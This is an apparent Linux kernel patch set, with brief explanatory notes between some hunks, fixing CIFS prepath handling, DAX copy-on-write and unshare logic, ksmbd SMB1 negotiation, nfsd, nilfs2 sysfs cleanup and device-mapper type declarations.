+@@ -287,4 +287,7 @@ extern void smb3_update_mnt_flags(struct cifs_sb_info *cifs_sb);
+  */
+ #define SMB3_MAX_DCLOSETIMEO (1 << 30)
+ #define SMB3_DEF_DCLOSETIMEO (1 * HZ) /* even 1 sec enough to help eg open/write/close/open/read */
++
++extern char *cifs_sanitize_prepath(char *prepath, gfp_t gfp);
++
+ #endif
+diff --git a/fs/cifs/misc.c b/fs/cifs/misc.c
+index 5542893ef03f7..2fae6b08314d9 100644
+--- a/fs/cifs/misc.c
++++ b/fs/cifs/misc.c
+@@ -1297,7 +1297,7 @@ int cifs_update_super_prepath(struct cifs_sb_info *cifs_sb, char *prefix)
+ 	kfree(cifs_sb->prepath);
+ 
+ 	if (prefix && *prefix) {
+-		cifs_sb->prepath = kstrdup(prefix, GFP_ATOMIC);
++		cifs_sb->prepath = cifs_sanitize_prepath(prefix, GFP_ATOMIC);
+ 		if (!cifs_sb->prepath)
+ 			return -ENOMEM;
+ 
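Exporting the sanitizer means DFS prefix updates in misc.c now get the same delimiter cleanup as mount-time parsing, instead of a raw kstrdup(). Per the function's own comment, runs of '/' or '\\' collapse and leading/trailing delimiters are dropped; a hedged round trip (input string invented, expected output per that comment):

/* GFP_ATOMIC as at the misc.c call site; the caller frees 'clean'.
 * Input (after C escaping):  //srv//share\dir/
 * Expected output:           srv/share\dir
 */
char raw[] = "//srv//share\\dir/";
char *clean = cifs_sanitize_prepath(raw, GFP_ATOMIC);
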
+diff --git a/fs/dax.c b/fs/dax.c
+index 3e457a16c7d18..2ababb89918de 100644
+--- a/fs/dax.c
++++ b/fs/dax.c
+@@ -781,6 +781,33 @@ out:
+ 	return ret;
+ }
+ 
++static int __dax_clear_dirty_range(struct address_space *mapping,
++		pgoff_t start, pgoff_t end)
++{
++	XA_STATE(xas, &mapping->i_pages, start);
++	unsigned int scanned = 0;
++	void *entry;
++
++	xas_lock_irq(&xas);
++	xas_for_each(&xas, entry, end) {
++		entry = get_unlocked_entry(&xas, 0);
++		xas_clear_mark(&xas, PAGECACHE_TAG_DIRTY);
++		xas_clear_mark(&xas, PAGECACHE_TAG_TOWRITE);
++		put_unlocked_entry(&xas, entry, WAKE_NEXT);
++
++		if (++scanned % XA_CHECK_SCHED)
++			continue;
++
++		xas_pause(&xas);
++		xas_unlock_irq(&xas);
++		cond_resched();
++		xas_lock_irq(&xas);
++	}
++	xas_unlock_irq(&xas);
++
++	return 0;
++}
++
+ /*
+  * Delete DAX entry at @index from @mapping.  Wait for it
+  * to be unlocked before deleting it.
+@@ -1258,15 +1285,20 @@ static s64 dax_unshare_iter(struct iomap_iter *iter)
+ 	/* don't bother with blocks that are not shared to start with */
+ 	if (!(iomap->flags & IOMAP_F_SHARED))
+ 		return length;
+-	/* don't bother with holes or unwritten extents */
+-	if (srcmap->type == IOMAP_HOLE || srcmap->type == IOMAP_UNWRITTEN)
+-		return length;
+ 
+ 	id = dax_read_lock();
+ 	ret = dax_iomap_direct_access(iomap, pos, length, &daddr, NULL);
+ 	if (ret < 0)
+ 		goto out_unlock;
+ 
++	/* zero the distance if srcmap is HOLE or UNWRITTEN */
++	if (srcmap->flags & IOMAP_F_SHARED || srcmap->type == IOMAP_UNWRITTEN) {
++		memset(daddr, 0, length);
++		dax_flush(iomap->dax_dev, daddr, length);
++		ret = length;
++		goto out_unlock;
++	}
++
+ 	ret = dax_iomap_direct_access(srcmap, pos, length, &saddr, NULL);
+ 	if (ret < 0)
+ 		goto out_unlock;
+@@ -1435,6 +1467,16 @@ static loff_t dax_iomap_iter(const struct iomap_iter *iomi,
+ 	 * written by write(2) is visible in mmap.
+ 	 */
+ 	if (iomap->flags & IOMAP_F_NEW || cow) {
++		/*
++		 * Filesystem allows CoW on non-shared extents. The src extents
++		 * may have been mmapped and marked dirty before. To be able
++		 * to invalidate their dax entries, we need to clear the
++		 * dirty mark in advance.
++		 */
++		if (cow)
++			__dax_clear_dirty_range(iomi->inode->i_mapping,
++						pos >> PAGE_SHIFT,
++						(end - 1) >> PAGE_SHIFT);
+ 		invalidate_inode_pages2_range(iomi->inode->i_mapping,
+ 					      pos >> PAGE_SHIFT,
+ 					      (end - 1) >> PAGE_SHIFT);
+@@ -2022,8 +2064,8 @@ int dax_dedupe_file_range_compare(struct inode *src, loff_t srcoff,
+ 
+ 	while ((ret = iomap_iter(&src_iter, ops)) > 0 &&
+ 	       (ret = iomap_iter(&dst_iter, ops)) > 0) {
+-		compared = dax_range_compare_iter(&src_iter, &dst_iter, len,
+-						  same);
++		compared = dax_range_compare_iter(&src_iter, &dst_iter,
++				min(src_iter.len, dst_iter.len), same);
+ 		if (compared < 0)
+ 			return ret;
+ 		src_iter.processed = dst_iter.processed = compared;
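__dax_clear_dirty_range(), added further up, uses the standard xarray long-scan idiom: operate under xas_lock_irq(), and every XA_CHECK_SCHED entries pause the iteration, drop the lock, and reschedule so huge ranges cannot trigger soft lockups. The idiom reduced to its skeleton:

/* Generic xarray scan with periodic rescheduling; the body between
 * lock and pause is where per-entry work (e.g. clearing tags) goes.
 */
XA_STATE(xas, &mapping->i_pages, start);
unsigned int scanned = 0;
void *entry;

xas_lock_irq(&xas);
xas_for_each(&xas, entry, end) {
	/* ... per-entry work under the lock ... */
	if (++scanned % XA_CHECK_SCHED)
		continue;
	xas_pause(&xas);	/* remember position across unlock */
	xas_unlock_irq(&xas);
	cond_resched();
	xas_lock_irq(&xas);
}
xas_unlock_irq(&xas);
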
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index 2be9d7460494b..b8f9d627f241d 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -326,10 +326,7 @@ int ksmbd_conn_handler_loop(void *p)
+ 
+ 		/* 4 for rfc1002 length field */
+ 		size = pdu_size + 4;
+-		conn->request_buf = kvmalloc(size,
+-					     GFP_KERNEL |
+-					     __GFP_NOWARN |
+-					     __GFP_NORETRY);
++		conn->request_buf = kvmalloc(size, GFP_KERNEL);
+ 		if (!conn->request_buf)
+ 			break;
+ 
+diff --git a/fs/ksmbd/server.c b/fs/ksmbd/server.c
+index 394b6ceac4312..0d8242789dc8f 100644
+--- a/fs/ksmbd/server.c
++++ b/fs/ksmbd/server.c
+@@ -289,10 +289,7 @@ static int queue_ksmbd_work(struct ksmbd_conn *conn)
+ 	work->request_buf = conn->request_buf;
+ 	conn->request_buf = NULL;
+ 
+-	if (ksmbd_init_smb_server(work)) {
+-		ksmbd_free_work_struct(work);
+-		return -EINVAL;
+-	}
++	ksmbd_init_smb_server(work);
+ 
+ 	ksmbd_conn_enqueue_request(work);
+ 	atomic_inc(&conn->r_count);
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index d0e76e2a14982..7e0b62f94a079 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -235,9 +235,6 @@ int init_smb2_neg_rsp(struct ksmbd_work *work)
+ 	struct smb2_negotiate_rsp *rsp;
+ 	struct ksmbd_conn *conn = work->conn;
+ 
+-	if (conn->need_neg == false)
+-		return -EINVAL;
+-
+ 	*(__be32 *)work->response_buf =
+ 		cpu_to_be32(conn->vals->header_size);
+ 
+diff --git a/fs/ksmbd/smb_common.c b/fs/ksmbd/smb_common.c
+index 5ab93fe0dec3f..212dfff8e764c 100644
+--- a/fs/ksmbd/smb_common.c
++++ b/fs/ksmbd/smb_common.c
+@@ -283,20 +283,121 @@ err_out:
+ 	return BAD_PROT_ID;
+ }
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work)
++#define SMB_COM_NEGOTIATE_EX	0x0
++
++/**
++ * get_smb1_cmd_val() - get smb command value from smb header
++ * @work:	smb work containing smb header
++ *
++ * Return:      smb command value
++ */
++static u16 get_smb1_cmd_val(struct ksmbd_work *work)
+ {
+-	struct ksmbd_conn *conn = work->conn;
++	return SMB_COM_NEGOTIATE_EX;
++}
+ 
+-	if (conn->need_neg == false)
++/**
++ * init_smb1_rsp_hdr() - initialize smb negotiate response header
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -EINVAL
++ */
++static int init_smb1_rsp_hdr(struct ksmbd_work *work)
++{
++	struct smb_hdr *rsp_hdr = (struct smb_hdr *)work->response_buf;
++	struct smb_hdr *rcv_hdr = (struct smb_hdr *)work->request_buf;
++
++	/*
++	 * Remove 4 byte direct TCP header.
++	 */
++	*(__be32 *)work->response_buf =
++		cpu_to_be32(sizeof(struct smb_hdr) - 4);
++
++	rsp_hdr->Command = SMB_COM_NEGOTIATE;
++	*(__le32 *)rsp_hdr->Protocol = SMB1_PROTO_NUMBER;
++	rsp_hdr->Flags = SMBFLG_RESPONSE;
++	rsp_hdr->Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
++		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
++	rsp_hdr->Pid = rcv_hdr->Pid;
++	rsp_hdr->Mid = rcv_hdr->Mid;
++	return 0;
++}
++
++/**
++ * smb1_check_user_session() - check for valid session for a user
++ * @work:	smb work containing smb request buffer
++ *
++ * Return:      0 on success, otherwise error
++ */
++static int smb1_check_user_session(struct ksmbd_work *work)
++{
++	unsigned int cmd = work->conn->ops->get_cmd_val(work);
++
++	if (cmd == SMB_COM_NEGOTIATE_EX)
+ 		return 0;
+ 
+-	init_smb3_11_server(conn);
++	return -EINVAL;
++}
++
++/**
++ * smb1_allocate_rsp_buf() - allocate response buffer for a command
++ * @work:	smb work containing smb request
++ *
++ * Return:      0 on success, otherwise -ENOMEM
++ */
++static int smb1_allocate_rsp_buf(struct ksmbd_work *work)
++{
++	work->response_buf = kmalloc(MAX_CIFS_SMALL_BUFFER_SIZE,
++			GFP_KERNEL | __GFP_ZERO);
++	work->response_sz = MAX_CIFS_SMALL_BUFFER_SIZE;
++
++	if (!work->response_buf) {
++		pr_err("Failed to allocate %u bytes buffer\n",
++				MAX_CIFS_SMALL_BUFFER_SIZE);
++		return -ENOMEM;
++	}
+ 
+-	if (conn->ops->get_cmd_val(work) != SMB_COM_NEGOTIATE)
+-		conn->need_neg = false;
+ 	return 0;
+ }
+ 
++static struct smb_version_ops smb1_server_ops = {
++	.get_cmd_val = get_smb1_cmd_val,
++	.init_rsp_hdr = init_smb1_rsp_hdr,
++	.allocate_rsp_buf = smb1_allocate_rsp_buf,
++	.check_user_session = smb1_check_user_session,
++};
++
++static int smb1_negotiate(struct ksmbd_work *work)
++{
++	return ksmbd_smb_negotiate_common(work, SMB_COM_NEGOTIATE);
++}
++
++static struct smb_version_cmds smb1_server_cmds[1] = {
++	[SMB_COM_NEGOTIATE_EX]	= { .proc = smb1_negotiate, },
++};
++
++static void init_smb1_server(struct ksmbd_conn *conn)
++{
++	conn->ops = &smb1_server_ops;
++	conn->cmds = smb1_server_cmds;
++	conn->max_cmds = ARRAY_SIZE(smb1_server_cmds);
++}
++
++void ksmbd_init_smb_server(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	__le32 proto;
++
++	if (conn->need_neg == false)
++		return;
++
++	proto = *(__le32 *)((struct smb_hdr *)work->request_buf)->Protocol;
++	if (proto == SMB1_PROTO_NUMBER)
++		init_smb1_server(conn);
++	else
++		init_smb3_11_server(conn);
++}
++
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work, int info_level,
+ 				      struct ksmbd_file *dir,
+ 				      struct ksmbd_dir_info *d_info,
+@@ -444,20 +545,10 @@ static int smb_handle_negotiate(struct ksmbd_work *work)
+ 
+ 	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+ 
+-	/*
+-	 * Remove 4 byte direct TCP header, add 2 byte bcc and
+-	 * 2 byte DialectIndex.
+-	 */
+-	*(__be32 *)work->response_buf =
+-		cpu_to_be32(sizeof(struct smb_hdr) - 4 + 2 + 2);
++	/* Add 2 byte bcc and 2 byte DialectIndex. */
++	inc_rfc1001_len(work->response_buf, 4);
+ 	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+ 
+-	neg_rsp->hdr.Command = SMB_COM_NEGOTIATE;
+-	*(__le32 *)neg_rsp->hdr.Protocol = SMB1_PROTO_NUMBER;
+-	neg_rsp->hdr.Flags = SMBFLG_RESPONSE;
+-	neg_rsp->hdr.Flags2 = SMBFLG2_UNICODE | SMBFLG2_ERR_STATUS |
+-		SMBFLG2_EXT_SEC | SMBFLG2_IS_LONG_NAME;
+-
+ 	neg_rsp->hdr.WordCount = 1;
+ 	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+ 	neg_rsp->ByteCount = 0;
+@@ -473,24 +564,13 @@ int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+ 		ksmbd_negotiate_smb_dialect(work->request_buf);
+ 	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+ 
+-	if (command == SMB2_NEGOTIATE_HE) {
+-		struct smb2_hdr *smb2_hdr = smb2_get_msg(work->request_buf);
+-
+-		if (smb2_hdr->ProtocolId != SMB2_PROTO_NUMBER) {
+-			ksmbd_debug(SMB, "Downgrade to SMB1 negotiation\n");
+-			command = SMB_COM_NEGOTIATE;
+-		}
+-	}
+-
+ 	if (command == SMB2_NEGOTIATE_HE) {
+ 		ret = smb2_handle_negotiate(work);
+-		init_smb2_neg_rsp(work);
+ 		return ret;
+ 	}
+ 
+ 	if (command == SMB_COM_NEGOTIATE) {
+ 		if (__smb2_negotiate(conn)) {
+-			conn->need_neg = true;
+ 			init_smb3_11_server(conn);
+ 			init_smb2_neg_rsp(work);
+ 			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+index d30ce4c1a1517..9130d2e3cd78c 100644
+--- a/fs/ksmbd/smb_common.h
++++ b/fs/ksmbd/smb_common.h
+@@ -427,7 +427,7 @@ bool ksmbd_smb_request(struct ksmbd_conn *conn);
+ 
+ int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+ 
+-int ksmbd_init_smb_server(struct ksmbd_work *work);
++void ksmbd_init_smb_server(struct ksmbd_work *work);
+ 
+ struct ksmbd_kstat;
+ int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+diff --git a/fs/namespace.c b/fs/namespace.c
+index ab467ee583411..14fa31f17d779 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -4286,9 +4286,9 @@ out:
+ 	unlock_mount_hash();
+ 
+ 	if (kattr->propagation) {
+-		namespace_unlock();
+ 		if (err)
+ 			cleanup_group_ids(mnt, NULL);
++		namespace_unlock();
+ 	}
+ 
+ 	return err;
+diff --git a/fs/nfsd/blocklayout.c b/fs/nfsd/blocklayout.c
+index 04697f8dc37d6..01d7fd108cf3d 100644
+--- a/fs/nfsd/blocklayout.c
++++ b/fs/nfsd/blocklayout.c
+@@ -297,6 +297,7 @@ nfsd4_block_get_device_info_scsi(struct super_block *sb,
+ 
+ out_free_dev:
+ 	kfree(dev);
++	gdp->gd_device = NULL;
+ 	return ret;
+ }
+ 
+diff --git a/fs/nfsd/nfs4callback.c b/fs/nfsd/nfs4callback.c
+index 2a815f5a52c4b..4039ffcf90ba5 100644
+--- a/fs/nfsd/nfs4callback.c
++++ b/fs/nfsd/nfs4callback.c
+@@ -946,8 +946,8 @@ static const struct cred *get_backchannel_cred(struct nfs4_client *clp, struct r
+ 		if (!kcred)
+ 			return NULL;
+ 
+-		kcred->uid = ses->se_cb_sec.uid;
+-		kcred->gid = ses->se_cb_sec.gid;
++		kcred->fsuid = ses->se_cb_sec.uid;
++		kcred->fsgid = ses->se_cb_sec.gid;
+ 		return kcred;
+ 	}
+ }
+diff --git a/fs/nfsd/nfs4xdr.c b/fs/nfsd/nfs4xdr.c
+index 97edb32be77f1..7799835c2196e 100644
+--- a/fs/nfsd/nfs4xdr.c
++++ b/fs/nfsd/nfs4xdr.c
+@@ -2476,10 +2476,12 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 	for (i = 0; i < argp->opcnt; i++) {
+ 		op = &argp->ops[i];
+ 		op->replay = NULL;
++		op->opdesc = NULL;
+ 
+ 		if (xdr_stream_decode_u32(argp->xdr, &op->opnum) < 0)
+ 			return false;
+ 		if (nfsd4_opnum_in_range(argp, op)) {
++			op->opdesc = OPDESC(op);
+ 			op->status = nfsd4_dec_ops[op->opnum](argp, &op->u);
+ 			if (op->status != nfs_ok)
+ 				trace_nfsd_compound_decode_err(argp->rqstp,
+@@ -2490,7 +2492,7 @@ nfsd4_decode_compound(struct nfsd4_compoundargs *argp)
+ 			op->opnum = OP_ILLEGAL;
+ 			op->status = nfserr_op_illegal;
+ 		}
+-		op->opdesc = OPDESC(op);
++
+ 		/*
+ 		 * We'll try to cache the result in the DRC if any one
+ 		 * op in the compound wants to be cached:
+@@ -5398,10 +5400,8 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	__be32 *p;
+ 
+ 	p = xdr_reserve_space(xdr, 8);
+-	if (!p) {
+-		WARN_ON_ONCE(1);
+-		return;
+-	}
++	if (!p)
++		goto release;
+ 	*p++ = cpu_to_be32(op->opnum);
+ 	post_err_offset = xdr->buf->len;
+ 
+@@ -5416,8 +5416,6 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	op->status = encoder(resp, op->status, &op->u);
+ 	if (op->status)
+ 		trace_nfsd_compound_encode_err(rqstp, op->opnum, op->status);
+-	if (opdesc && opdesc->op_release)
+-		opdesc->op_release(&op->u);
+ 	xdr_commit_encode(xdr);
+ 
+ 	/* nfsd4_check_resp_size guarantees enough room for error status */
+@@ -5458,6 +5456,9 @@ nfsd4_encode_operation(struct nfsd4_compoundres *resp, struct nfsd4_op *op)
+ 	}
+ status:
+ 	*p = op->status;
++release:
++	if (opdesc && opdesc->op_release)
++		opdesc->op_release(&op->u);
+ }
+ 
+ /* 
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 76c3bd88b8582..7aea13c33ddf3 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2607,11 +2607,10 @@ static int nilfs_segctor_thread(void *arg)
+ 	goto loop;
+ 
+  end_thread:
+-	spin_unlock(&sci->sc_state_lock);
+-
+ 	/* end sync. */
+ 	sci->sc_task = NULL;
+ 	wake_up(&sci->sc_wait_task); /* for nilfs_segctor_kill_thread() */
++	spin_unlock(&sci->sc_state_lock);
+ 	return 0;
+ }
+ 
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 1422b8ba24ed6..77f1e5778d1c8 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -482,6 +482,7 @@ static void nilfs_put_super(struct super_block *sb)
+ 		up_write(&nilfs->ns_sem);
+ 	}
+ 
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+@@ -1105,6 +1106,7 @@ nilfs_fill_super(struct super_block *sb, void *data, int silent)
+ 	nilfs_put_root(fsroot);
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_dat);
+diff --git a/fs/nilfs2/the_nilfs.c b/fs/nilfs2/the_nilfs.c
+index 3a4c9c150cbf5..2894152a6b25c 100644
+--- a/fs/nilfs2/the_nilfs.c
++++ b/fs/nilfs2/the_nilfs.c
+@@ -87,7 +87,6 @@ void destroy_nilfs(struct the_nilfs *nilfs)
+ {
+ 	might_sleep();
+ 	if (nilfs_init(nilfs)) {
+-		nilfs_sysfs_delete_device_group(nilfs);
+ 		brelse(nilfs->ns_sbh[0]);
+ 		brelse(nilfs->ns_sbh[1]);
+ 	}
+@@ -305,6 +304,10 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 		goto failed;
+ 	}
+ 
++	err = nilfs_sysfs_create_device_group(sb);
++	if (unlikely(err))
++		goto sysfs_error;
++
+ 	if (valid_fs)
+ 		goto skip_recovery;
+ 
+@@ -366,6 +369,9 @@ int load_nilfs(struct the_nilfs *nilfs, struct super_block *sb)
+ 	goto failed;
+ 
+  failed_unload:
++	nilfs_sysfs_delete_device_group(nilfs);
++
++ sysfs_error:
+ 	iput(nilfs->ns_cpfile);
+ 	iput(nilfs->ns_sufile);
+ 	iput(nilfs->ns_dat);
+@@ -697,10 +703,6 @@ int init_nilfs(struct the_nilfs *nilfs, struct super_block *sb, char *data)
+ 	if (err)
+ 		goto failed_sbh;
+ 
+-	err = nilfs_sysfs_create_device_group(sb);
+-	if (err)
+-		goto failed_sbh;
+-
+ 	set_nilfs_init(nilfs);
+ 	err = 0;
+  out:
+diff --git a/include/acpi/video.h b/include/acpi/video.h
+index 8ed9bec03e534..ff5a8da5d8832 100644
+--- a/include/acpi/video.h
++++ b/include/acpi/video.h
+@@ -59,8 +59,6 @@ extern void acpi_video_unregister(void);
+ extern void acpi_video_register_backlight(void);
+ extern int acpi_video_get_edid(struct acpi_device *device, int type,
+ 			       int device_id, void **edid);
+-extern enum acpi_backlight_type acpi_video_get_backlight_type(void);
+-extern bool acpi_video_backlight_use_native(void);
+ /*
+  * Note: The value returned by acpi_video_handles_brightness_key_presses()
+  * may change over time and should not be cached.
+@@ -69,6 +67,19 @@ extern bool acpi_video_handles_brightness_key_presses(void);
+ extern int acpi_video_get_levels(struct acpi_device *device,
+ 				 struct acpi_video_device_brightness **dev_br,
+ 				 int *pmax_level);
++
++extern enum acpi_backlight_type __acpi_video_get_backlight_type(bool native,
++								bool *auto_detect);
++
++static inline enum acpi_backlight_type acpi_video_get_backlight_type(void)
++{
++	return __acpi_video_get_backlight_type(false, NULL);
++}
++
++static inline bool acpi_video_backlight_use_native(void)
++{
++	return __acpi_video_get_backlight_type(true, NULL) == acpi_backlight_native;
++}
+ #else
+ static inline void acpi_video_report_nolcd(void) { return; };
+ static inline int acpi_video_register(void) { return -ENODEV; }
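The header rework funnels both public helpers through one worker, __acpi_video_get_backlight_type(native, auto_detect), so a caller that cares can also learn whether the result came from auto-detection. A hedged usage sketch; the caller below is hypothetical:

/* Distinguish an explicit choice from an auto-detected one via the
 * new out-parameter.
 */
bool auto_detected;
enum acpi_backlight_type type =
	__acpi_video_get_backlight_type(false, &auto_detected);

if (type == acpi_backlight_native && auto_detected)
	pr_info("native backlight selected by auto-detection\n");
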
+diff --git a/include/linux/device-mapper.h b/include/linux/device-mapper.h
+index 04c6acf7faaa5..201dd1ab7f1c6 100644
+--- a/include/linux/device-mapper.h
++++ b/include/linux/device-mapper.h
+@@ -87,10 +87,10 @@ typedef int (*dm_preresume_fn) (struct dm_target *ti);
+ typedef void (*dm_resume_fn) (struct dm_target *ti);
+ 
+ typedef void (*dm_status_fn) (struct dm_target *ti, status_type_t status_type,
+-			      unsigned status_flags, char *result, unsigned maxlen);
++			      unsigned int status_flags, char *result, unsigned int maxlen);
+ 
+-typedef int (*dm_message_fn) (struct dm_target *ti, unsigned argc, char **argv,
+-			      char *result, unsigned maxlen);
++typedef int (*dm_message_fn) (struct dm_target *ti, unsigned int argc, char **argv,
++			      char *result, unsigned int maxlen);
+ 
+ typedef int (*dm_prepare_ioctl_fn) (struct dm_target *ti, struct block_device **bdev);
+ 
+@@ -187,7 +187,7 @@ struct target_type {
+ 	uint64_t features;
+ 	const char *name;
+ 	struct module *module;
+-	unsigned version[3];
++	unsigned int version[3];
+ 	dm_ctr_fn ctr;
+ 	dm_dtr_fn dtr;
+ 	dm_map_fn map;
+@@ -313,31 +313,31 @@ struct dm_target {
+ 	 * It is a responsibility of the target driver to remap these bios
+ 	 * to the real underlying devices.
+ 	 */
+-	unsigned num_flush_bios;
++	unsigned int num_flush_bios;
+ 
+ 	/*
+ 	 * The number of discard bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_discard_bios;
++	unsigned int num_discard_bios;
+ 
+ 	/*
+ 	 * The number of secure erase bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_secure_erase_bios;
++	unsigned int num_secure_erase_bios;
+ 
+ 	/*
+ 	 * The number of WRITE ZEROES bios that will be submitted to the target.
+ 	 * The bio number can be accessed with dm_bio_get_target_bio_nr.
+ 	 */
+-	unsigned num_write_zeroes_bios;
++	unsigned int num_write_zeroes_bios;
+ 
+ 	/*
+ 	 * The minimum number of extra bytes allocated in each io for the
+ 	 * target to use.
+ 	 */
+-	unsigned per_io_data_size;
++	unsigned int per_io_data_size;
+ 
+ 	/* target specific data */
+ 	void *private;
+@@ -383,7 +383,7 @@ struct dm_target {
+ 
+ void *dm_per_bio_data(struct bio *bio, size_t data_size);
+ struct bio *dm_bio_from_per_bio_data(void *data, size_t data_size);
+-unsigned dm_bio_get_target_bio_nr(const struct bio *bio);
++unsigned int dm_bio_get_target_bio_nr(const struct bio *bio);
+ 
+ u64 dm_start_time_ns_from_clone(struct bio *bio);
+ 
+@@ -394,7 +394,7 @@ void dm_unregister_target(struct target_type *t);
+  * Target argument parsing.
+  */
+ struct dm_arg_set {
+-	unsigned argc;
++	unsigned int argc;
+ 	char **argv;
+ };
+ 
+@@ -403,8 +403,8 @@ struct dm_arg_set {
+  * the error message to use if the number is found to be outside that range.
+  */
+ struct dm_arg {
+-	unsigned min;
+-	unsigned max;
++	unsigned int min;
++	unsigned int max;
+ 	char *error;
+ };
+ 
+@@ -413,7 +413,7 @@ struct dm_arg {
+  * returning -EINVAL and setting *error.
+  */
+ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		unsigned *value, char **error);
++		unsigned int *value, char **error);
+ 
+ /*
+  * Process the next argument as the start of a group containing between
+@@ -421,7 +421,7 @@ int dm_read_arg(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+  * *num_args or, if invalid, return -EINVAL and set *error.
+  */
+ int dm_read_arg_group(const struct dm_arg *arg, struct dm_arg_set *arg_set,
+-		      unsigned *num_args, char **error);
++		      unsigned int *num_args, char **error);
+ 
+ /*
+  * Return the current argument and shift to the next.
+@@ -431,7 +431,7 @@ const char *dm_shift_arg(struct dm_arg_set *as);
+ /*
+  * Move through num_args arguments.
+  */
+-void dm_consume_args(struct dm_arg_set *as, unsigned num_args);
++void dm_consume_args(struct dm_arg_set *as, unsigned int num_args);
+ 
+ /*-----------------------------------------------------------------
+  * Functions for creating and manipulating mapped devices.
+@@ -461,7 +461,7 @@ void *dm_get_mdptr(struct mapped_device *md);
+ /*
+  * A device can still be used while suspended, but I/O is deferred.
+  */
+-int dm_suspend(struct mapped_device *md, unsigned suspend_flags);
++int dm_suspend(struct mapped_device *md, unsigned int suspend_flags);
+ int dm_resume(struct mapped_device *md);
+ 
+ /*
+@@ -481,7 +481,7 @@ struct gendisk *dm_disk(struct mapped_device *md);
+ int dm_suspended(struct dm_target *ti);
+ int dm_post_suspending(struct dm_target *ti);
+ int dm_noflush_suspending(struct dm_target *ti);
+-void dm_accept_partial_bio(struct bio *bio, unsigned n_sectors);
++void dm_accept_partial_bio(struct bio *bio, unsigned int n_sectors);
+ void dm_submit_bio_remap(struct bio *clone, struct bio *tgt_clone);
+ union map_info *dm_get_rq_mapinfo(struct request *rq);
+ 
+@@ -525,7 +525,7 @@ int dm_set_geometry(struct mapped_device *md, struct hd_geometry *geo);
+  * First create an empty table.
+  */
+ int dm_table_create(struct dm_table **result, fmode_t mode,
+-		    unsigned num_targets, struct mapped_device *md);
++		    unsigned int num_targets, struct mapped_device *md);
+ 
+ /*
+  * Then call this once for each target.
+diff --git a/include/linux/dm-bufio.h b/include/linux/dm-bufio.h
+index 15d9e15ca830d..1262d92ab88fc 100644
+--- a/include/linux/dm-bufio.h
++++ b/include/linux/dm-bufio.h
+@@ -26,8 +26,8 @@ struct dm_buffer;
+  * Create a buffered IO cache on a given device
+  */
+ struct dm_bufio_client *
+-dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-		       unsigned reserved_buffers, unsigned aux_size,
++dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++		       unsigned int reserved_buffers, unsigned int aux_size,
+ 		       void (*alloc_callback)(struct dm_buffer *),
+ 		       void (*write_callback)(struct dm_buffer *),
+ 		       unsigned int flags);
+@@ -81,7 +81,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+  * I/O to finish.
+  */
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks);
++		       sector_t block, unsigned int n_blocks);
+ 
+ /*
+  * Release a reference obtained with dm_bufio_{read,get,new}. The data
+@@ -106,7 +106,7 @@ void dm_bufio_mark_buffer_dirty(struct dm_buffer *b);
+  * write the specified part of the buffer or it may write a larger superset.
+  */
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end);
++					unsigned int start, unsigned int end);
+ 
+ /*
+  * Initiate writing of dirty buffers, without waiting for completion.
+@@ -152,9 +152,9 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ /*
+  * Set the minimum number of buffers before cleanup happens.
+  */
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n);
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c);
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c);
